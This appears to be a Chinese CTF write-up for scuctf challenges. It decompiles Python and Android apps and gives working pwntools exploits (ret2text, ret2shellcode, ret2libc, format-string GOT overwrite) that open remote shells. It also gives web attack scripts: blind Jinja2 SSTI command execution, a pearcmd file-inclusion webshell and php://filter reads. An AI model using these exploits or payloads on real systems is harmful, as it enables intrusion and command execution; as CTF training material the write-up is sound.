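          0x5A, 0x41, 0x5F, 0x50, 0x4B, 0x42, 0x5E, 0x45, 0x41, 0x5A, 0x40, 0x58, 0x55, 0x4B, 0x4D,
          0x5A, 0x40, 0x4B, 0x5F, 0x45, 0x5A, 0x43, 0x58, 0x41, 0x4B, 0x59, 0x4D, 0x5A]


def decode(values: list[int], key: int = 0x28, delta: int = 4) -> str:
    """Return the text whose bytes b satisfy (b + delta) ^ key == values[i]."""
    return "".join(chr((v ^ key) - delta) for v in values)


def main() -> None:
    print(decode(target))


if __name__ == "__main__":
    main()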
ez_dp 使用pyinstxtractor工具分解出pyc
猜测函数主逻辑位于 t4.pyc
,反编译。
# ez_dp: decompiled main dialog (t4.pyc).  Indentation was reconstructed from
# a flattened listing; the per-submission reset at the end of tj() is read as
# running on every submission.
import wx, wx.xrc, random


class MyDialog1(wx.Dialog):
    """Addition quiz: answer 9999999 sums with 100% accuracy to be shown the flag."""
    x = 123          # current left operand
    y = 321          # current right operand
    tot = 0          # submissions so far
    zq = 0           # correct submissions so far
    flag = 0         # counter incremented by gogogo(); becomes the flag number

    def __init__(self, parent):
        wx.Dialog.__init__(self, parent, id=(wx.ID_ANY), title=(wx.EmptyString), pos=(wx.DefaultPosition), size=(wx.Size(400, 200)), style=(wx.DEFAULT_DIALOG_STYLE))
        self.SetSizeHintsSz(wx.DefaultSize, wx.DefaultSize)
        bSizer1 = wx.BoxSizer(wx.VERTICAL)
        self.m_staticText1 = wx.StaticText(self, wx.ID_ANY, '123+321', wx.DefaultPosition, wx.DefaultSize, 0)
        self.m_staticText1.Wrap(-1)
        self.m_staticText1.SetFont(wx.Font(36, 70, 90, 90, False, '宋体'))
        bSizer1.Add(self.m_staticText1, 0, wx.ALL, 5)
        self.m_textCtrl1 = wx.TextCtrl(self, wx.ID_ANY, '在此输入您的答案', wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER)
        bSizer1.Add(self.m_textCtrl1, 0, wx.ALL, 5)
        self.m_button2 = wx.Button(self, wx.ID_ANY, '提交', wx.DefaultPosition, wx.DefaultSize, 0)
        bSizer1.Add(self.m_button2, 0, wx.ALL, 5)
        self.m_staticText2 = wx.StaticText(self, wx.ID_ANY, '做出9999999道加法题,而且准确率为100%就给你flag', wx.DefaultPosition, wx.DefaultSize, 0)
        self.m_staticText2.Wrap(-1)
        bSizer1.Add(self.m_staticText2, 0, wx.ALL, 5)
        self.SetSizer(bSizer1)
        self.Layout()
        self.Centre(wx.BOTH)
        # Both Enter in the text box and the button submit through tj().
        self.m_textCtrl1.Bind(wx.EVT_TEXT_ENTER, self.tj)
        self.m_button2.Bind(wx.EVT_BUTTON, self.tj)

    def __del__(self):
        pass

    def gogogo(self, x):
        """Count the ways to reach x >= 100 from x in steps of 1 or 2.

        Every call below 100 branches twice with no memoisation, so the call
        count grows like the Fibonacci numbers: gogogo(0) is not feasible to
        run; the flag must be computed by recurrence instead (see write-up).
        """
        if x >= 100:
            self.flag += 1
            return
        self.gogogo(x + 1)
        self.gogogo(x + 2)

    def get_flag(self):
        self.gogogo(0)
        return self.flag

    def tj(self, event):
        """Submission handler: check the answer, update stats, hand out the flag."""
        self.tot += 1
        ans = self.m_textCtrl1.Value
        try:
            # NOTE(review): eval() on the raw text-box content -- any Python
            # expression typed here executes with the app's privileges.
            if eval(ans) == self.x + self.y:
                self.zq += 1
                self.m_staticText2.Label = '答案正确 正确率:' + str(self.zq) + '/' + str(self.tot)
            else:
                self.m_staticText2.Label = '答案错误 正确率:' + str(self.zq) + '/' + str(self.tot)
        except:  # bare except: every eval failure (SyntaxError, NameError, ...) lands here
            self.m_staticText2.Label = '未知错误 正确率:' + str(self.zq) + '/' + str(self.tot)
        else:
            # Flag only after 9999999 answers with no mistake at all.
            if self.zq >= 9999999:
                if self.zq == self.tot:
                    a = self.get_flag()
                    self.m_staticText2.Label = 'scuctf{' + str(a) + '}'
        # Next question: two random operands in [0, 1000).
        self.m_textCtrl1.Value = ''
        self.x = random.choice(range(1000))
        self.y = random.choice(range(1000))
        self.m_staticText1.Label = str(self.x) + '+' + str(self.y)


app = wx.App(False)
zjm = MyDialog1(None)
zjm.Show(True)
app.MainLoop()
发现 gogogo 的递归满足 f(x) = f(x+1) + f(x+2),且 x ≥ 100 时 f(x) = 1,即斐波那契数列:f(100-k) = F(k+2)(F1 = F2 = 1),所以 flag = F(102)。直接递归是指数级调用,跑不出来,按递推算即可。
ez_android 用 JADX 分析 .apk,主逻辑位于 `com/example/check/MainActivity`:
package com.example.check;

import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import androidx.appcompat.app.AppCompatActivity;
import com.example.check.databinding.ActivityMainBinding;

/**
 * Decompiled main screen of the ez_android challenge.
 *
 * Seven buttons: button3 appends '0' and button5 appends '1' to a bit string,
 * button7 submits it to the native check_s() and, when that returns 0,
 * derives the flag from the bit string's hashCode().  Because the derivation
 * is a pure function of the string, the flag can be computed offline once the
 * accepted bit string is known (see the exp below).
 */
public class MainActivity extends AppCompatActivity {
    private ActivityMainBinding binding;
    private int click_times = 0;            // presses of any button so far
    private String string = new String();   // bit string built from button3 ('0') / button5 ('1')
    private TextView textView;

    /** Native check of the bit string (libcheck.so); 0 means accepted. */
    public native int check_s(String str);
    public native String stringFromJNI();

    static {
        System.loadLibrary("check");
    }

    @Override
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater());
        this.binding = inflate;
        setContentView(inflate.getRoot());
        this.textView = (TextView) findViewById(R.id.textView2);
        ((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                MainActivity.this.click1();
            }
        });
        ((Button) findViewById(R.id.button2)).setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                MainActivity.this.click2();
            }
        });
        ((Button) findViewById(R.id.button3)).setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                MainActivity.this.click3();
            }
        });
        ((Button) findViewById(R.id.button4)).setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                MainActivity.this.click4();
            }
        });
        ((Button) findViewById(R.id.button5)).setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                MainActivity.this.click5();
            }
        });
        ((Button) findViewById(R.id.button6)).setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                MainActivity.this.click6();
            }
        });
        ((Button) findViewById(R.id.button7)).setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                MainActivity.this.click7();
            }
        });
    }

    /** Count a press; after 1000 presses the label shows a fixed string (not the flag the write-up obtains). */
    private void update() {
        int i = this.click_times + 1;
        this.click_times = i;
        if (i >= 1000) {
            this.textView.setText("scuctf{I_do_not_like_Android}");
        } else {
            this.textView.setText("你已经点击" + String.valueOf(this.click_times) + "次,加油!");
        }
    }

    public void click1() {
        update();
    }

    public void click2() {
        update();
    }

    /** Append a '0' bit. */
    public void click3() {
        update();
        this.string += '0';
    }

    public void click4() {
        update();
    }

    /** Append a '1' bit. */
    public void click5() {
        update();
        this.string += '1';
    }

    public void click6() {
        update();
    }

    /** Submit: if check_s accepts the bit string, show the flag derived from its hashCode(). */
    public void click7() {
        update();
        if (check_s(this.string) == 0) {
            this.textView.setText("nice");
            String str = new String();
            String str2 = new String();
            // Decimal digits of the hash, least significant first.  hashCode % 10
            // keeps the sign, so a negative hash contributes "-d" pieces.
            for (int hashCode = this.string.hashCode(); hashCode != 0; hashCode /= 10) {
                str = str + String.valueOf(hashCode % 10);
            }
            // Then each character of that digit string becomes its ASCII code.
            for (int i = 0; i < str.length(); i++) {
                str2 = str2 + String.valueOf((int) str.charAt(i));
            }
            this.textView.setText("scuctf{" + str2 + "}");
        }
    }
}
基本逻辑:通过 click3 和 click5 生成一串 01 串,再调用 native 层函数 check_s 检验。
找到判断函数后,发现它依次解析二进制并返回表中对应的值;把 flag 中的字符按该表映射回二进制后拼接起来即可。
exp
/**
 * Replays the flag derivation from MainActivity.click7 on the 0/1 string
 * accepted by the native check: the decimal digits of hashCode() (least
 * significant first, '-' included for a negative hash) are each replaced by
 * their character code and wrapped in scuctf{...}.
 */
public class android {
    public static void main(String[] args) {
        String string = "111110010001111100001001111111101111010111111110110111111101000001001001011100111111101111110111111100011111000111111100001111100100011111000010011111110000111110011100010000010100110000000111111101000110101111111111101111100111100100000010111001111100111111111111001000111110000100111111110111101011111111011011111111101010000001111110111111000101011111110101011111101111100011111111010010000001010011001100011111001111111101101111111000001011011010010100101111111010010100010001111100011111111111110010100110000010100010111001100";
        // Digits of the hash, least significant first. Java's % keeps the sign
        // of the dividend, so a negative hash appends "-d" pairs here.
        StringBuilder digits = new StringBuilder();
        for (int h = string.hashCode(); h != 0; h /= 10) {
            digits.append(h % 10);
        }
        System.out.println(string.hashCode());
        // Character code of every digit (and of any '-'), concatenated with no separator.
        StringBuilder codes = new StringBuilder();
        for (char c : digits.toString().toCharArray()) {
            codes.append((int) c);
        }
        System.out.println("scuctf{" + codes + "}");
    }
}
PWN 2048_game 测试2048水平?(雾
test_your_nc 用 nc 连上后 cat flag 即可。
# ret2text
from pwn import *

# Local copy of the challenge binary. NOTE(review): `elf` is never used
# below; the address in the payload was taken from the binary by hand.
elf = ELF("ret2text")

# 40 bytes of padding up to the saved return address (32 + 4 + 4 as the
# author counted it), then the 32-bit address written over it.
payload = b"A" * (32 + 4 + 4)
payload += p32(0x08049256)

sh = remote("114.117.187.56", 10002)
sh.sendline(payload)
sh.interactive()
# ret2shellcode
from pwn import *

context(arch="amd64", os="linux")

sh = remote("114.117.187.56", 10003)
# First prompt: the pwntools shellcraft.sh() stub, assembled for amd64.
sh.recv()
sh.sendline(asm(shellcraft.sh()))
# Second prompt: 40 bytes of padding followed by 0x4040A0 as a 64-bit
# value, presumably the address where the first input was stored.
sh.recv()
sh.sendline(b"A" * (32 + 8) + p64(0x4040A0))
sh.interactive()
# ret2libc
from pwn import *
from LibcSearcher import *

context(log_level="debug")
context.terminal = ["konsole", "-e"]

elf = ELF("ret2libc")
elf_puts_got = elf.got["puts"]
elf_puts_plt = elf.plt["puts"]
# NOTE(review): the two __libc_start_main lookups and pop_rsi_pop_r15_ret
# below are never used.
__libc_start_main_got = elf.got["__libc_start_main"]
__libc_start_main_symb = elf.symbols["__libc_start_main"]

# Addresses read off this particular build by hand.
main_symb = 0x4010F0
pop_rdi_ret = 0x401333
pop_rsi_pop_r15_ret = 0x401331
ret = 0x40101a

# NOTE(review): the port is given as a string here, unlike the other scripts.
sh = remote("114.117.187.56", "10007")

# Stage 1: call puts on its own GOT entry to leak the libc address of puts,
# then return to main so a second input can be sent.
payload1 = b"A" * (32 + 8) + p64(pop_rdi_ret)
payload1 += p64(elf_puts_got)
payload1 += p64(elf_puts_plt)
payload1 += p64(main_symb)
sh.recv()
sh.sendline(payload1)
# The leaked bytes sit between a one-byte prefix and the "\nDo" the service
# prints next; the [1:-3] slice depends on exactly that framing.
leaked_puts_str = sh.recvuntil(b"\nDo")
sh.recv()
puts_real = (u64(leaked_puts_str[1:-3].ljust(8, b"\x00")))
print(hex(puts_real))

# Identify the remote libc from the leaked puts address and compute its base.
searcher = LibcSearcher("puts", puts_real)
libc_base = puts_real - searcher.dump("puts")

# Stage 2: system("/bin/sh"); the extra `ret` gadget before system is
# presumably there for stack alignment.
payload2 = b"A" * (32 + 8) + p64(pop_rdi_ret)
str_bin_sh = searcher.dump("str_bin_sh") + libc_base
payload2 += p64(str_bin_sh)
system_sh = searcher.dump("system") + libc_base
payload2 += p64(ret)
payload2 += p64(system_sh)
sh.sendline(payload2)
sh.interactive()
# fmt
from pwn import *
from LibcSearcher import *

context(log_level="debug", terminal=["konsole", "-e"], arch="amd64")

sh = remote("114.117.187.56", "10004")
elf = ELF("./fmt")
# NOTE(review): `libc` is loaded but never used; the addresses below come
# from LibcSearcher instead.
libc = ELF("./libc.so.6")

# Leak 1: "%7$08s" prints the string pointed to by the 7th argument, i.e. the
# GOT address appended right after the "BB" marker, so the 8-byte pointer
# stored there comes back in the reply.
payload_leak = b"%7$08sBB"
payload_leak += p64(elf.got["__libc_start_main"])
sh.recv()
sh.sendline(payload_leak)
leaked_libc_start_main = sh.recvuntil(b"BB")
# [2:-2] drops two leading bytes and the trailing "BB"; this depends on the
# exact reply framing.
leaked_libc_start_main = u64(leaked_libc_start_main[2:-2].ljust(8, b"\x00"))
libc_s = LibcSearcher("__libc_start_main", leaked_libc_start_main)

printf_got = elf.got["printf"]

# Leak 2: same trick for puts@got, used as a second constraint on the libc.
payload_leak2 = b"%7$08sBB"
payload_leak2 += p64(elf.got["puts"])
sh.recv()
sh.sendline(payload_leak2)
sh.recv()
leaked_puts = sh.recvuntil(b"BB")
leaked_puts = u64(leaked_puts[2:-2].ljust(8, b"\x00"))
print(leaked_puts)
libc_s.add_condition("puts", leaked_puts)
libc_s.select_libc(0)

libc_base = leaked_libc_start_main - libc_s.dump("__libc_start_main")
system_addr = libc_s.dump("system") + libc_base
# NOTE(review): `printf_addr` is computed but never used.
printf_addr = libc_s.dump("printf") + libc_base
print(hex(printf_got))
print(hex(system_addr))

# Write: overwrite printf's GOT entry with system's address (format string
# argument offset 6), then the next input string is what printf receives.
payload = fmtstr_payload(6, {printf_got: system_addr})
print(len(payload))
sh.sendline(payload)
sh.recv()
sh.sendline(b"/bin/sh")
sh.interactive()

# Author's scratch notes from several runs, kept as bare string literals.
''' in 1st case 0x7f47e26a0c90 0x7f47e2691290 other 0x7f97d4037c90 0x7f97d4028290 0x7f70c6c4dc90 0x7f70c6c3e290 '''
# Runs only after the interactive session above has ended.
sh.recv()
''' 0x70 0x17 0xfd 0x1d 0x7e 0x7f 0x00 0x00 0x00007f7e1dfd1770 70 1 0x404038 <printf@got.plt>: 0x70 0x97 0xb2 0x9b 0xa0 0x7f 0x00 0x00 0x404040 <alarm@got.plt>: 0xa0 0xc1 0xba 0x9b 0xa0 0x7f 0x00 0x00 0x404048 <read@got.plt>: 0x00 0x10 0xbd 0x9b 0xa0 0x7f 0x00 0x00 0x404050 <signal@got.plt>: 0x80 0x28 0xb1 0x9b 0xa0 0x7f 0x00 0x00 0x7fa09bb233d0 0x7fa09bb29770 0x00007fa09bb29770 <printf@got.plt>: 0x70 0x97 0xb2 0x9b 0xa0 
0x7f 0x00 0x00 <printf@got.plt>: 0x00007ff660ecd770 0x00007ff660f501a0 '''
Web CheckIn 用数组绕过 hash 函数。
import requests

# CheckIn: both values are sent as array parameters (`a[]`, `b[]`), one in
# the query string and one in the form body, and the reply is printed as-is.
url = "http://114.117.187.56:11000/"
query = {"a[]": 1}
form = {"b[]": 2}

r = requests.post(url, params=query, data=form)
print(r.text)
Include 用伪协议读取 flag.php。
import requests
from base64 import *

# Include: ask the `file` parameter for flag.php through a php://filter
# chain that base64-encodes the source instead of executing it.
url = "http://114.117.187.56:11002/"
filter_chain = r"php://filter/read=convert.base64-encode/resource=flag.php"
r = requests.post(url, params={"file": filter_chain})

# The response itself is not printed; the literal below is presumably the
# base64 body captured on an earlier run, decoded here locally.
captured = b"PD9waHANCiRmbGFnID0gJ3NjdWN0Zns2YWZmNWE3N2JhNjg1ODY1MTVhYTViMGE5YTFiZTVhMn0nOw=="
print(b64decode(captured))
easy_flask 首先爆破出 Popen 位于 subclasses 中的哪个下标。
import requests

# easy_flask, step 1: sweep the entries of object's subclasses list (index
# spliced between payload1 and payload2) looking for one whose __init__
# globals contain a `popen`. The dunder names are written reversed
# ("__ssalc__"[::-1] etc.) and resolved through Jinja's attr() filter.
payload1 = '''{% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())['''
payload2 = ''']|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]("sleep 50") == "chiv"%} a {% endif %}'''
# Previous response body; starts as the int 0 so the first reply always prints.
tmp = 0
for i in range(200):
    prams = {"name": payload1 + str(i) + payload2}
    req = requests.get("http://114.117.187.56:11003/view", params=prams)
    # Print only when the reply differs from the previous one, i.e. at the
    # indices where the server's behaviour changes (presumably error page
    # vs. normal render).
    if (req.text != tmp):
        tmp = req.text
        print(i, req.text)
爆破出是第139个。
环境不能出网,只能盲注。
import requests
from string import printable

# easy_flask, step 2: with no outbound network (per the writeup) the command
# output is read back one character per request through the template's if
# branch; this loop assumes the app answers "Ok" when the comparison holds
# and "NO" otherwise.
# NOTE(review): subclass index 137 is used here, while the text reports 139.
payload = '''{% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())[137]|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]('galf/ tac'[::-1]).read()['''
payload2 = ''']=="'''
payload3 = '''"%} a {% endif %}'''
for index in range(100):
    # NOTE(review): `flag` is assigned but never read, so a position with no
    # matching character (or an unexpected reply) is skipped silently and
    # the scan continues through all 100 positions.
    flag = 1
    for char in printable:
        # `char` is spliced into the template and the query string unescaped;
        # printable includes whitespace, '"' and '%', which can break the
        # template rather than test the character.
        param = {"name": payload + str(index) + payload2 + char + payload3}
        req = requests.get("http://114.117.187.56:11003/view", params=param)
        if req.text == "Ok":
            print(char, end="")
            break
        elif req.text != "NO":
            flag = 0
import requests
from base64 import *

# JSJSJS: a single POST to the flag endpoint; the body is printed as-is.
url = "http://114.117.187.56:11005/api/flag"
response = requests.post(url)
print(response.text)
import requests
from base64 import *

# baby_ip: the password is kept base64-encoded in the script and decoded at
# send time; the request also carries an X-Forwarded-For header naming the
# loopback address.
url = "http://114.117.187.56:11004/"
form = {"password": b64decode(b"aGdneXlkcw==")}
extra_headers = {"X-Forwarded-For": "127.0.0.1"}

response = requests.post(url, data=form, headers=extra_headers)
print(response.text)
import requests
from base64 import *

# 可爱的探针 (the "probe" challenge): POST to tz.php with act=phpinfo and
# print the whole page.
url = "http://117.50.188.49:1145/tz.php"
query = {"act": "phpinfo"}

response = requests.post(url, params=query)
print(response.text)
python tmp_web.py | grep SCUCTF
真ikun进 view http://114.117.187.56:11006/js/game.js?s=4
let flag = "c23Rme22QwOTJlLTYyNDQtMTFlZC1hYTFhLWM4NThjMDllYjE0MH0=";
// The `g` flag makes `regex` stateful: a successful test() leaves lastIndex at
// the end of the match and the next test() resumes searching from there; a
// failed test() resets lastIndex to 0. So the four if-blocks below succeed
// alternately, and only the 1st and 3rd insertions actually happen.
const regex = /lgg/g;
// Inserts `str` after the first `offset` characters of the string.
String.prototype.insetAt = function (str, offset) {
    var regx = new RegExp("(.{" + offset + "})");
    return this.replace(regx, "$1" + str);
};
if (regex.test("lgg")) {          // true:  lastIndex 0 -> 3
    flag = flag.insetAt('N1Y', 2);
}
if (regex.test("lgg")) {          // false: search starts at 3, lastIndex reset to 0
    flag = flag.insetAt("QC2", 6);
}
if (regex.test("yuelgg")) {       // true:  match at 3, lastIndex -> 6
    flag = flag.insetAt('JiY', 10);
}
if (regex.test("yuelgg")) {       // false: search starts at 6, lastIndex reset to 0
    flag = flag.insetAt('C3Y', 14);
}
let trueflag = flag;
run this code
# Decode the base64 string that the game.js snippet ends up with.
printf '%s\n' 'c2N1Y3Rme2JiY2QwOTJlLTYyNDQtMTFlZC1hYTFhLWM4NThjMDllYjE0MH0=' | base64 -d
简单的CMS 被编码问题坑惨了。。。。
http://114.117.187.56:12000/?+config-create+/&r=../../../../../../../../../../../usr/share/php/pearcmd&/<?=print(1);?>+/tmp/ktou.php
import requests
from base64 import *

# 简单的CMS: the `r` query parameter names a file under /tmp (written in the
# previous step), and form field "1" carries a PHP statement that the
# planted file presumably evaluates. The reply is printed as-is.
url = "http://114.117.187.56:12000/"
include_path = '''../../../../../../../../tmp/ktou'''
form = {"1": '''system("cat /flag*");'''}

response = requests.post(url, params={"r": include_path}, data=form)
print(response.text)
import requests
from base64 import *

# unserialize: send a hand-written PHP serialized object A in `p`. Note the
# declared property count (2) is larger than the number of pairs actually
# present (1).
url = "http://114.117.187.56:11008/"
serialized = '''O:1:"A":2:{s:3:"kfc";s:7:"v_me_50";}'''

response = requests.post(url, params={"p": serialized})
print(response.text)
ezbypass 环境崩了,只说下思路。
http://43.142.108.183:8085/?url=php://filter/read=convert.iconv.UTF-16BE.UTF-32BE/resource=/flag
对这串 base64 解码,去掉所有 \x00 字节,就可以得到 flag 了。